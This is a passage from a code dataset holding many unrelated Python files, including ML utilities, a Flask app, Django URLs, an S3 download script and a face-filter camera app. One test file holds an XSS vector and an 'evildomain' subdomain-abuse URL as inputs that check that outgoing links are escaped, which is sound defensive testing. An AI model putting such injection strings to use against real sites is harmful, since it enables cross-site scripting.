ValueError(msg)\n\n self.input_type = input_type\n self.eps = eps\n\n if input_type == 'image':\n self.inception = model.fid.InceptionV3()\n self.inception.eval()\n\n def calc(\n self, images_a: Union[torch.Tensor, List[torch.Tensor]],\n images_b: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor:\n if self.input_type == 'feature':\n features_a = images_a\n features_b = images_b\n else:\n features_a = self.calc_feature(images_a)\n features_b = self.calc_feature(images_b)\n\n mu_a = torch.mean(features_a, dim=0)\n mu_b = torch.mean(features_b, dim=0)\n sigma_a = torch.cov(features_a.t())\n sigma_b = torch.cov(features_b.t())\n diff_mu = mu_a - mu_b\n covmean, error = utils.sqrtm_newton_schulz(sigma_a.mm(sigma_b),\n num_iters=100)\n\n if not torch.isfinite(covmean).all():\n offset = utils.to_device(\n torch.eye(sigma_a.size(0), dtype=sigma_a.dtype) * self.eps,\n utils.get_device(sigma_a))\n covmean, error = utils.sqrtm_newton_schulz(\n (sigma_a + offset).mm(sigma_b + offset), num_iters=100)\n\n fid = diff_mu.dot(diff_mu) + torch.trace(sigma_a + sigma_b -\n 2 * covmean)\n return fid\n\n def calc_feature(self, images: Union[torch.Tensor, List[torch.Tensor]]):\n if not hasattr(self, 'inception'):\n self.inception = model.fid.InceptionV3()\n self.inception.eval()\n\n images = [\n F.interpolate(image.unsqueeze(0),\n size=(299, 299),\n mode='bilinear',\n align_corners=False) for image in images\n ]\n images = torch.cat(images, dim=0)\n images = 2 * images - 1\n features = self.inception(images)[0].squeeze(2).squeeze(2)\n return features\n","sub_path":"src/iqapt/fid.py","file_name":"fid.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"239477677","text":"import torch\nimport spacy\nfrom torchtext.data.metrics import bleu_score\n\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nimport sys\n\n\ndef translate_sentence_ger(model, sentence, german, english, device, max_length=50):\n # Load german tokenizer\n spacy_ger = spacy.load(\"de\")\n\n # Create tokens using spacy and everything in lower case (which is what our vocab is)\n if type(sentence) == str:\n tokens = [token.text.lower() for token in spacy_ger(sentence)]\n else:\n tokens = [token.lower() for token in sentence]\n\n # Add and in beginning and end respectively\n tokens.insert(0, german.init_token)\n tokens.append(german.eos_token)\n\n # Go through each german token and convert to an index\n text_to_indices = [german.vocab.stoi[token] for token in tokens]\n\n # Convert to Tensor\n sentence_tensor = torch.LongTensor(text_to_indices).unsqueeze(1).to(device)\n\n outputs = [english.vocab.stoi[\"\"]]\n for i in range(max_length):\n trg_tensor = torch.LongTensor(outputs).unsqueeze(1).to(device)\n\n with torch.no_grad():\n output = model(sentence_tensor, trg_tensor)\n\n best_guess = output.argmax(2)[-1, :].item()\n outputs.append(best_guess)\n\n if best_guess == english.vocab.stoi[\"\"]:\n break\n\n translated_sentence = [english.vocab.itos[idx] for idx in outputs]\n # remove start token\n return translated_sentence[1:]\n\n\ndef translate_sentence_en(model, sentence, english, german, device, max_length=50):\n # Load german tokenizer\n spacy_en = spacy.load(\"en\")\n\n # Create tokens using spacy and everything in lower case (which is what our vocab is)\n if type(sentence) == str:\n tokens = [token.text.lower() for token in spacy_en(sentence)]\n else:\n tokens = [token.lower() for token in sentence]\n print(\"length of english sentence is: \", len(tokens))\n print(f\"The english sentence is: {sentence}\")\n # Add and in beginning and end respectively\n tokens.insert(0, english.init_token)\n tokens.append(english.eos_token)\n\n # Go through each german token and convert to an index\n text_to_indices = [english.vocab.stoi[token] for token in tokens]\n\n # Convert to Tensor\n sentence_tensor = torch.LongTensor(text_to_indices).unsqueeze(1).to(device)\n\n outputs = [german.vocab.stoi[\"\"]]\n for i in range(max_length):\n trg_tensor = torch.LongTensor(outputs).unsqueeze(1).to(device)\n\n with torch.no_grad():\n output = model(sentence_tensor, trg_tensor)\n\n best_guess = output.argmax(2)[-1, :].item()\n outputs.append(best_guess)\n\n if best_guess == german.vocab.stoi[\"\"]:\n break\n\n translated_sentence = [german.vocab.itos[idx] for idx in outputs]\n print(f\"length of translated sentence is: \", len(translated_sentence))\n print(f\"the translated german sentence is: {translated_sentence}\")\n # remove start token\n return translated_sentence[1:]\n\n\ndef bleu(data, model, english, german, device):\n model.eval()\n targets = []\n outputs = []\n\n for example in data:\n src = vars(example)[\"src\"]\n trg = vars(example)[\"trg\"]\n\n prediction = translate_sentence_en(model, src, english, german, device)\n prediction = prediction[:-1] # remove token\n\n targets.append([trg])\n outputs.append(prediction)\n\n return bleu_score(outputs, targets)\n\n\ndef save_checkpoint(state, filename):\n print(\"=> Saving checkpoint\")\n torch.save(state, filename)\n\n\ndef load_checkpoint(checkpoint, model, optimizer):\n print(\"=> Loading checkpoint\")\n model.load_state_dict(checkpoint[\"state_dict\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])","sub_path":"german-english-transformer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487704224","text":"from os import path\n\nfrom django.conf import settings\n\nfrom mock import patch\nfrom nose.tools import assert_not_equal, eq_, ok_\n\nimport amo.tests\nfrom amo.utils import ImageCheck\nfrom mkt.site.utils import (get_outgoing_url, linkify_bounce_url_callback,\n linkify_with_outgoing)\n\ndef test_outgoing_url():\n redirect_url = settings.REDIRECT_URL\n secretkey = settings.REDIRECT_SECRET_KEY\n exceptions = settings.REDIRECT_URL_WHITELIST\n settings.REDIRECT_URL = 'http://example.net'\n settings.REDIRECT_SECRET_KEY = 'sekrit'\n settings.REDIRECT_URL_WHITELIST = ['nicedomain.com']\n\n try:\n myurl = 'http://example.com'\n s = get_outgoing_url(myurl)\n\n # Regular URLs must be escaped.\n eq_(s,\n 'http://example.net/bc7d4bb262c9f0b0f6d3412ede7d3252c2e311bb1d55f6'\n '2315f636cb8a70913b/'\n 'http%3A//example.com')\n\n # No double-escaping of outgoing URLs.\n s2 = get_outgoing_url(s)\n eq_(s, s2)\n\n evil = settings.REDIRECT_URL.rstrip('/') + '.evildomain.com'\n s = get_outgoing_url(evil)\n assert_not_equal(s, evil,\n 'No subdomain abuse of double-escaping protection.')\n\n nice = 'http://nicedomain.com/lets/go/go/go'\n eq_(nice, get_outgoing_url(nice))\n\n finally:\n settings.REDIRECT_URL = redirect_url\n settings.REDIRECT_SECRET_KEY = secretkey\n settings.REDIRECT_URL_WHITELIST = exceptions\n\n\ndef test_outgoing_url_dirty_unicode():\n bad = (u'http://chupakabr.ru/\\u043f\\u0440\\u043e\\u0435\\u043a\\u0442\\u044b/'\n u'\\u043c\\u0443\\u0437\\u044b\\u043a\\u0430-vkontakteru/')\n get_outgoing_url(bad) # bug 564057\n\n\ndef test_outgoing_url_query_params():\n url = 'http://xx.com?q=1&v=2'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed\n\n url = 'http://xx.com?q=1&v=2'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('http%3A//xx.com%3Fq=1&v=2'), fixed\n\n # Check XSS vectors.\n url = 'http://xx.com?q=1&v=2\" style=\"123\"'\n fixed = get_outgoing_url(url)\n assert fixed.endswith('%3A//xx.com%3Fq=1&v=2%22%20style=%22123%22'), fixed\n\n\n@patch('mkt.site.utils.get_outgoing_url')\ndef test_linkify_bounce_url_callback(mock_get_outgoing_url):\n mock_get_outgoing_url.return_value = 'bar'\n\n res = linkify_bounce_url_callback({'href': 'foo'})\n\n # Make sure get_outgoing_url was called.\n eq_(res, {'href': 'bar'})\n mock_get_outgoing_url.assert_called_with('foo')\n\n\n@patch('mkt.site.utils.linkify_bounce_url_callback')\ndef test_linkify_with_outgoing_text_links(mock_linkify_bounce_url_callback):\n def side_effect(attrs, new=False):\n attrs['href'] = 'bar'\n return attrs\n\n mock_linkify_bounce_url_callback.side_effect = side_effect\n\n # Without nofollow.\n res = linkify_with_outgoing('a text http://example.com link', nofollow=False)\n eq_(res, 'a text http://example.com link')\n\n # With nofollow (default).\n res = linkify_with_outgoing('a text http://example.com link')\n ok_(res in [\n 'a text http://example.com link',\n 'a text http://example.com link'])\n\n res = linkify_with_outgoing('a text http://example.com link', nofollow=True)\n ok_(res in [\n 'a text http://example.com link',\n 'a text http://example.com link'])\n\n\n@patch('mkt.site.utils.linkify_bounce_url_callback')\ndef test_linkify_with_outgoing_markup_links(mock_linkify_bounce_url_callback):\n def side_effect(attrs, new=False):\n attrs['href'] = 'bar'\n return attrs\n\n mock_linkify_bounce_url_callback.side_effect = side_effect\n\n # Without nofollow.\n res = linkify_with_outgoing(\n 'a markup link with text',\n nofollow=False)\n eq_(res, 'a markup link with text')\n\n # With nofollow (default).\n res = linkify_with_outgoing(\n 'a markup link with text')\n ok_(res in ['a markup link with text',\n 'a markup link with text'])\n\n res = linkify_with_outgoing(\n 'a markup link with text',\n nofollow=True)\n ok_(res in ['a markup link with text',\n 'a markup link with text'])\n\n\ndef get_image_path(name):\n return path.join(settings.ROOT, 'apps', 'amo', 'tests', 'images', name)\n\n\nclass TestAnimatedImages(amo.tests.TestCase):\n\n def test_animated_images(self):\n img = ImageCheck(open(get_image_path('animated.png')))\n assert img.is_animated()\n img = ImageCheck(open(get_image_path('non-animated.png')))\n assert not img.is_animated()\n\n img = ImageCheck(open(get_image_path('animated.gif')))\n assert img.is_animated()\n img = ImageCheck(open(get_image_path('non-animated.gif')))\n assert not img.is_animated()\n\n def test_junk(self):\n img = ImageCheck(open(__file__, 'rb'))\n assert not img.is_image()\n img = ImageCheck(open(get_image_path('non-animated.gif')))\n assert img.is_image()\n","sub_path":"mkt/site/tests/test_utils_.py","file_name":"test_utils_.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238718605","text":"from collections import OrderedDict\nimport logging as log\nfrom exchange.order_books.book_price_q import BookPriceQ\n\n\nclass Node:\n\tdef __init__(self, data, prev = None, next = None):\n\t\tself.data = data\n\t\tself.next = next\n\t\tself.prev = prev\n\nclass SortedIndexedDefaultList:\n\t'''\n\tThis is an indexable, double-linked linked list with insertions coming always form iteration from the start.\n\tDelete: O(1)\n\tInsert: O(n) - but o(1) to put at front\n\tRead: : O(1)\n\n\tRetrieving a missing element will spur the creation of the element via the initialized.\n\t'''\n\tdef __init__(self, index_func, initializer, index_multiplier = 1 ):\n\t\tself.start = None\n\t\tself.end = None\n\t\tself.index_func = index_func\n\t\tself.index_multiplier = index_multiplier\n\t\tself.index = {}\n\t\tself.initializer = initializer\n\n\tdef __str__(self):\n\t\treturn ',\\n'.join([str(i) for i in self.ascending_items()])\n\n\n\tdef insert(self, data):\n\t\tid = self.index_func(data)\n\t\tif id in self.index:\n\t\t\traise KeyError\n\t\telse:\n\t\t\tn=Node(data = data)\n\t\t\tself.index[id] = n\n\n\t\t\tif self.start is None:\t #insert into linked list from start\n\t\t\t\tself.start = n\n\t\t\t\tself.end = n\n\t\t\t\treturn n.data\n\t\t\telif self.index_multiplier*self.index_func(self.start.data) > self.index_multiplier*id: #inserting at start\n\t\t\t\tself.start.prev = n\n\t\t\t\tn.next = self.start\n\t\t\t\tself.start = n\n\t\t\t\treturn n.data\n\t\t\telse:\n\t\t\t\tcurrent = self.start \n\t\t\t\twhile current.next is not None and self.index_multiplier*self.index_func(current.next.data) <= self.index_multiplier*id:\n\t\t\t\t\tcurrent = current.next\n\n\t\t\t\tif current.next is None: #insert into end of linked list\n\t\t\t\t\tcurrent.next = n\n\t\t\t\t\tn.prev = current\n\t\t\t\t\tself.end = n\n\t\t\t\t\treturn current.next.data\n\t\t\t\telse:\t\t\t\t\t#insert into middle of linked list\n\t\t\t\t\tn.next = current.next\n\t\t\t\t\tn.prev = current\n\t\t\t\t\tcurrent.next.prev = n\n\t\t\t\t\tcurrent.next = n\n\t\t\t\t\treturn current.next.data\n\n\tdef __contains__(self, index):\n\t\treturn index in self.index\n\n\tdef __getitem__(self, index):\n\t\tif index not in self.index:\n\t\t\treturn self.insert(self.initializer(index))\n\t\telse:\n\t\t\treturn self.index[index].data\t\n\n\tdef remove(self, index):\n\t\ttry:\n\t\t\tnode = self.index[index]\n\t\texcept KeyError as e:\n\t\t\tlog.debug('node at {} already removed'.format(index))\n\t\t\treturn\n\t\tif node == self.start:\n\t\t\tself.start = node.next\n\t\telse:\n\t\t\tprev = node.prev\n\t\t\tprev.next = node.next\n\n\t\tif node == self.end:\n\t\t\tself.end = node.prev\n\t\telse:\n\t\t\tnext = node.next\n\t\t\tnext.prev = node.prev\n\n\t\tdel self.index[index]\n\n\tdef ascending_items(self):\n\t\tcurrent = self.start\n\t\twhile current is not None:\n\t\t\tyield current.data\n\t\t\tcurrent = current.next\n\n\tdef descending_items(self):\n\t\tcurrent = self.end\n\t\twhile current is not None:\n\t\t\tyield current.data\n\t\t\tcurrent = current.prev\n\n\nif __name__ == '__main__':\n\tl = SortedIndexedDefaultList(index_func = lambda bpq : bpq.price, initializer = lambda price: BookPriceQ(price))\n\tprint(l)\n\tl.insert(BookPriceQ(10))\n\tprint(l)\n\tl.insert(BookPriceQ(11))\n\tprint(l)\n\tl.insert(BookPriceQ(9))\n\tprint(l)\n\tl.remove(9)\n\tprint(l)\n\n","sub_path":"exchange_server/exchange/order_books/list_elements.py","file_name":"list_elements.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233211623","text":"from flask import Flask, render_template, request\r\nfrom database import add_user, read_from_db\r\napp = Flask(__name__)\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef index():\r\n name = 'Noname'\r\n if request.method == 'POST':\r\n name = request.form['name']\r\n add_user(name)\r\n\r\n _data = read_from_db()\r\n return render_template('index.html', data=_data)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165535565","text":"from django.conf.urls import url, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.routers import DefaultRouter\nfrom .views import BlogPostViewSet\n\n\napi_blog_post_list = BlogPostViewSet.as_view(\n {\n 'get': 'list',\n 'post': 'create',\n }\n)\napi_blog_post_detail = BlogPostViewSet.as_view(\n {\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy',\n }\n)\nuser_blog_post_detail = BlogPostViewSet.as_view(\n {\n 'get': 'detail_view'\n }\n)\nuser_blog_post_list = BlogPostViewSet.as_view(\n {\n 'get': 'list_view'\n }\n)\n\nurlpatterns = [\n url(r'^api/$', api_blog_post_list, name='blogpost-list'),\n url(r'^$', user_blog_post_list, name='blogpost-list-user'),\n url(r'^api/(?P[0-9]+)/$', api_blog_post_detail, name='blogpost-detail'),\n url(\n r'^(?P[0-9]+)/$',\n user_blog_post_detail,\n name='blogpost-detail-user'\n ),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474021736","text":"#A1 A2 A4 A6\nimport xlrd\nimport random\nimport pylab as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties # 字体管理器\n\n# 设置汉字格式\nfont = FontProperties(fname=r\"consnerdi.ttf\", size=12)\nworkbook = xlrd.open_workbook(r'乙醇浓度&选择性.xlsx')\nsheet = workbook.sheet_by_index(0)\nx1 = [250, 275, 300, 350, 400]\nx2 = [0.3, 0.9, 1.68, 2.1]\nx2_ = [1.68, 2.1]\nfig = plt.figure()\nax = fig.add_subplot(projection = '3d')\n\nfor i in range(0, 5):\n z = sheet.row_values(i)\n x = x1[i]\n xs = np.array(x2)\n zs = np.array(z)\n ax.plot(xs, zs, x, zdir='y', color='b', marker='o', alpha=0.8)\n\nworkbook_ = xlrd.open_workbook(r'乙醇浓度&选择性 B.xlsx')\nsheet_ = workbook_.sheet_by_index(0)\nfor i in range(0, 5):\n z = sheet_.row_values(i)\n x = x1[i]\n xs = np.array(x2_)\n zs = np.array(z)\n ax.plot(xs, zs, x, zdir='y', color='r', marker='o', alpha=0.8)\n\nl1 = []\nl2 = []\nfor i in range(0, 3):\n z = sheet.col_values(i)\n x = x2[i]\n xs = np.array(x1)\n zs = np.array(z)\n ax.plot(xs, zs, x, zdir='x', color='b', marker='o', alpha=0.8)\n\nz = sheet.col_values(3)\nx = x2[3]\nxs = np.array(x1)\nzs = np.array(z)\nax.plot(xs, zs, x, zdir='x', color='b', marker='o', alpha=0.8, label = 'A装填方式')\n\nfor i in range(0, 1):\n z = sheet_.col_values(i)\n x = x2_[i]\n xs = np.array(x1)\n zs = np.array(z)\n ax.plot(xs, zs, x, zdir='x', color='r', marker='o', alpha=0.8)\n\nz = sheet_.col_values(1)\nx = x2_[1]\nxs = np.array(x1)\nzs = np.array(z)\nax.plot(xs, zs, x, zdir='x', color='r', marker='o', alpha=0.8, label = 'B装填方式')\n\nplt.title('乙醇浓度与C4烯烃选择性关系图', fontproperties = font)\nax.set_xlabel('乙醇浓度', fontproperties = font)\nax.set_zlabel('C4烯烃选择性', fontproperties = font)\nax.set_ylabel('温度', fontproperties = font)\nplt.legend(loc = 'upper left', prop = font)\n#ax.legend(loc = 'upper left')\nplt.savefig(\"浓度2.png\")\nplt.show()","sub_path":"画饼/乙醇浓度&选择性.py","file_name":"乙醇浓度&选择性.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549538673","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\ndef lagrange(x,i,a):\r\n Li = 1\r\n for j in range(len(a)):\r\n if (i != j):\r\n Li *= (x-a[j])/(a[i]-a[j])\r\n return Li\r\ndef interpol(x,a,b):\r\n P = 0\r\n for i in range(len(a)):\r\n P += b[i]*lagrange(x,i,a)\r\n return P\r\ndef interpol_fichier(fichier):\r\n # Open file\r\n f = open(fichier,'r')\r\n lignes = f.readlines()\r\n f.close()\r\n\r\n # Add points to array a & b\r\n a = np.zeros(len(lignes))\r\n b = np.zeros(len(lignes))\r\n for i in range(len(lignes)):\r\n t = lignes[i].split()\r\n a[i] = t[0]\r\n b[i] = t[1]\r\n \r\n # Show the fixing points\r\n plt.scatter(a,b)\r\n\r\n # Create the linspace\r\n abcisse = np.linspace(min(a)-0.5,max(a)+0.5,10000)\r\n ordonne = [interpol(k,a,b) for k in abcisse]\r\n plt.plot(abcisse,ordonne)\r\n plt.show()\r\ninterpol_fichier(\"D:/Dev/Python/PCSI/TP 13/interpolation.txt\")","sub_path":"TP 13/ex2-bonus.py","file_name":"ex2-bonus.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417155705","text":"import time\nimport json\nimport boto3\n\n\ndef str_decode(val):\n val = val.split('\\n')\n ip_adress = val[0]\n launch_time = val[1]\n uptime = int(float(val[2].split(' ', 1)[0]))\n os_version = val[4]\n return ip_adress, launch_time, uptime, os_version\n \ndef lambda_handler(event, context):\n\n # boto3 client\n client = boto3.client('ec2')\n ssm = boto3.client('ssm')\n \n # getting instance information and ssm instance information\n describeInstance = client.describe_instances()\n ssm_describeInstance = ssm.describe_instance_information()\n\n InstanceId=[]\n # fetchin instance id of the running instances\n for i in describeInstance['Reservations']:\n for instance in i['Instances']:\n if instance[\"State\"][\"Name\"] == \"running\":\n InstanceId.append(instance['InstanceId'])\n\n # looping through instance ids\n for instanceid in InstanceId:\n # command to be executed on instance\n response = ssm.send_command(\n InstanceIds=[instanceid],\n DocumentName=\"AWS-RunShellScript\",\n Parameters={'commands': ['hostname -i; uptime -s; cat /proc/uptime; cat /etc/*_version']})\n \n # fetching command id for the output\n json_response = response['Command']['CommandId']\n time.sleep(3)\n\n # fetching command output\n json_output = ssm.get_command_invocation(\n CommandId=json_response,\n InstanceId=instanceid\n )\n \n ip_address, launch_time, uptime, os_version = str_decode(str(json_output['StandardOutputContent']))\n # print(ip_address, launch_time, uptime, os_version)\n # print(json_output['InstanceId'])\n return json_output\n","sub_path":"aws/commands-ec2-lambda.py","file_name":"commands-ec2-lambda.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611131376","text":"import xlrd\nimport numpy as np\n\n\ndef read_games(games_file):\n f = open(games_file, \"r\")\n game_string = f.read()\n\n games = game_string.split(\"\\n\\n\")\n\n # final games holds a list of list where each list is a separate string representation of the game\n final_games = [[character.strip() for line in games[i].split(\"\\n\") for character in line.split()]\n for i in range(len(games))]\n\n # print(final_games)\n return final_games\n\n\ndef read_excel_sheets(games_file):\n final_games = []\n workbook = xlrd.open_workbook(games_file)\n f = open('sudoku_9x9_extreme.txt', 'w+')\n\n for i in range(workbook.nsheets):\n sheet = workbook.sheet_by_index(i)\n for i in range(1, sheet.nrows, 1):\n for character in convert_blanks_in_row_to_zeros(sheet.row_values(i)).split():\n\n f.write(character + \" \")\n f.write(\"\\n\") # end of the line\n f.write(\"\\n\") # end of an individual game\n # print(final_games)\n\n f.close()\n # return final_games\n\n\ndef convert_game(sheet):\n game_string = \"\"\n for i in range(1, sheet.nrows, 1):\n game_string += convert_blanks_in_row_to_zeros(sheet.row_values(i))\n return game_string.split()\n\n\ndef convert_blanks_in_row_to_zeros(row):\n print(\"Row\")\n print(row)\n string = \"\"\n for val in row:\n if val == '':\n string += \" 0 \"\n else:\n string += (\" \" + str(int(val)) + \" \")\n\n print(string)\n return string\n","sub_path":"file_parser.py","file_name":"file_parser.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565396252","text":"synset_path = \"./synset.txt\"\nimage_size = 224\n\nnr_examples_per_epoch_for_train = 12 # insert here all total nr of imagenet photos\nnr_epochs_per_decay = 350.0 # Epochs after which learning rate decays.\nmoving_average_decay = 0.9999 # The decay to use for the moving average.\nlearning_rate_decay_factor = 0.1 # Learning rate decay factor.\ninitial_learning_rate = 0.001 # Initial learning rate.\ndropout = 0.5\n\nbatch_size = 1\nmax_steps = 100 #200000\ncheckpoint_steps = 10\nsummary_steps = 10\nprint_steps = 10\n\ndict_path = \"./dict.txt\"\ncheckpoint_path = './checkpoint'\ndata_dir = \"/media/ioana/E9A4-CCE4/imagenet/\"\n# data_dir = \"./imagenet/\"\ntrain_dir = './train'\neval_dir = './eval'\nwordnet_mapping = './wordnet_mapping'\n\nretrain = True\n\n","sub_path":"vgg16_config.py","file_name":"vgg16_config.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207815617","text":"import labrad\nimport numpy\nfrom fly_processing import Interpolator\nfrom scan729 import scan729\n \ncxn = labrad.connect()\ndv = cxn.data_vault\ndv.cd(['','Calibrations', 'Double Pass 729DP'])\ndv.open(12)\ndata = dv.get().asarray\nfreq_interp = data[:,0]\nampl_interp = data[:,1]\ncxn.disconnect()\ninterp = Interpolator(freq_interp, ampl_interp)\n\nfreq_min = 160.0\nfreq_max = 250.0\nfreq_step = 1.0\n\nfreqs = numpy.arange(freq_min, freq_max + freq_step, freq_step)\nfreqs = numpy.clip(freqs, freq_min, freq_max)\nampls = interp.interpolated(freqs)\nfreqs = freqs.tolist()\nampls = ampls.tolist()\n\nparams = {\n 'frequencies_729':freqs,\n 'amplitudes_729': ampls,\n 'doppler_cooling':10*10**-3,\n 'heating_time':1.0e-3,\n 'rabi_time':0.1e-3,#0.5*10**-3,\n 'readout_time':5*10**-3,\n 'repump_time':10*10**-3,\n 'repump_854_ampl': -3.0,\n 'repump_866_ampl': -11.0,\n 'doppler_cooling_freq':103.0,\n 'doppler_cooling_ampl':-11.0,\n 'readout_freq':107.0,\n 'readout_ampl':-11.0\n }\nexprtParams = {\n 'startNumber': 10,\n 'iterations': 1\n }\n\nanalysis = {\n 'threshold':30,\n }\nexprt = scan729(params,exprtParams, analysis)\nexprt.run()","sub_path":"old_files/scan729_calibrated.py","file_name":"scan729_calibrated.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154017442","text":"\nimport boto\nimport conf\nimport sys, os\nfrom boto.s3.key import Key\nfrom time import time\nfrom boto.exception import S3ResponseError\n\nBUCKET_NAME = \"mybucket-craftdemo\"\nAWS_ACCESS_KEY_ID= conf.AWS_ACCESS_KEY\nAWS_ACCESS_SECRET_KEY = conf.AWS_SECRET_ACCESS_KEY\nDOWNLOAD_LOCATION_PATH = os.path.expanduser(\"~\") + \"/s3-drain/\"\nif not os.path.exists(DOWNLOAD_LOCATION_PATH):\n print (\"Making download directory\")\n os.mkdir(DOWNLOAD_LOCATION_PATH)\n\n\ndef drain_s3():\n ts = time()\n conn = boto.connect_s3(AWS_ACCESS_KEY_ID, AWS_ACCESS_SECRET_KEY)\n bucket = conn.get_bucket(BUCKET_NAME)\n\n #goto through the list of files\n# bucket_list = bucket.list(prefix='0')\n bucket_list = bucket.list()\n for l in bucket_list:\n key_string = str(l.key)\n s3_path = DOWNLOAD_LOCATION_PATH + key_string\n try:\n print (\"Current File is \", s3_path)\n l.get_contents_to_filename(s3_path)\n except (OSError,S3ResponseError) as e:\n pass\n # check if the file has been downloaded locally\n if not os.path.exists(s3_path):\n try:\n os.makedirs(s3_path)\n except OSError as exc:\n # let guard againts race conditions\n import errno\n if exc.errno != errno.EEXIST:\n raise\n\n\n\n print('Took {}s'.format(time() - ts))\nif __name__ == '__main__':\n drain_s3()\n","sub_path":"bin/s3drain_iterative.py","file_name":"s3drain_iterative.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434564316","text":"import pickle\nimport os\nimport sys\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.clock import Clock\nfrom kivy.graphics.texture import Texture\nfrom kivy.core.window import Window\nfrom kivy.core.text import LabelBase\n\nimport cv2 as cv\nimport face_recognition\nimport numpy as np\nfrom utils import image_resize\nfrom identifier import get_faces_data\nfrom collections import deque\n\n\n# Declare dependencies\n#Paths\nsys.path.append('.')\nkivy.resources.resource_add_path('.')\n\n# Kivy Font\nLabelBase.register(name = 'OpenSans', fn_regular = 'OpenSans-Regular.ttf')\n\n# Cascades\nface_cascade = cv.CascadeClassifier('cascades/haarcascade_frontalface_alt.xml')\neyes_cascade = cv.CascadeClassifier('cascades/frontalEyes35x16.xml')\nnose_cascade = cv.CascadeClassifier('cascades/Nose18x15.xml')\n\n# Faces data\nwith open('faces-data.pickle', 'rb') as file:\n faces_data = pickle.load(file)\n\n# Glasses + Mustache files\nglasses = cv.imread(\"filters/glasses.png\", -1)\nmustache = cv.imread('filters/mustache.png',-1)\n\n# Painter globals\n# Define the upper and lower boundaries for a color to be considered \"Blue\"\nblue_lower = np.array([100, 60, 60])\nblue_upper = np.array([140, 255, 255])\n# Define a 5x5 kernel for erosion and dilation\nkernel = np.ones((5, 5), np.uint8)\n# Setup deques to store separate colors in separate arrays\nbpoints = [deque(maxlen=512)]\ngpoints = [deque(maxlen=512)]\nrpoints = [deque(maxlen=512)]\nbindex = 0\ngindex = 0\nrindex = 0\n# Drawing setting\ncolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255), (255, 255, 255), (0, 0, 0), (120,120,120)]\ncolorIndex = 0\nfont = cv.FONT_HERSHEY_SIMPLEX\n\n\nclass HomeScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.capture = cv.VideoCapture(0)\n self.triger(self.update_cam)\n\n def triger(self, triger_mode): #higher order function\n Clock.unschedule(self.update_cam)\n Clock.unschedule(self.detect_faces)\n Clock.unschedule(self.identify_faces)\n Clock.unschedule(self.glasses)\n Clock.unschedule(self.painter)\n Clock.schedule_interval(triger_mode, 1/60)\n \n def update_cam(self, dt):\n # repeatly update camera frame\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n\n #convert frame to texture\n buf = cv.flip(frame, 0)\n #buf = buf.tostring()\n buf = buf.tobytes()\n\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n\n # display frame from the texture\n self.ids.cam.texture = texture_f \n\n def glasses(self, dt):\n # Apply glassess + Mustache feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n frame = cv.cvtColor(frame, cv.COLOR_BGR2BGRA)\n\n for (x, y, w, h) in faces:\n roi_gray = gray[y:y+h, x:x+h]\n roi_color = frame[y:y+h, x:x+h]\n\n eyes = eyes_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n roi_eyes = roi_gray[ey: ey + eh, ex: ex + ew]\n glasses2 = 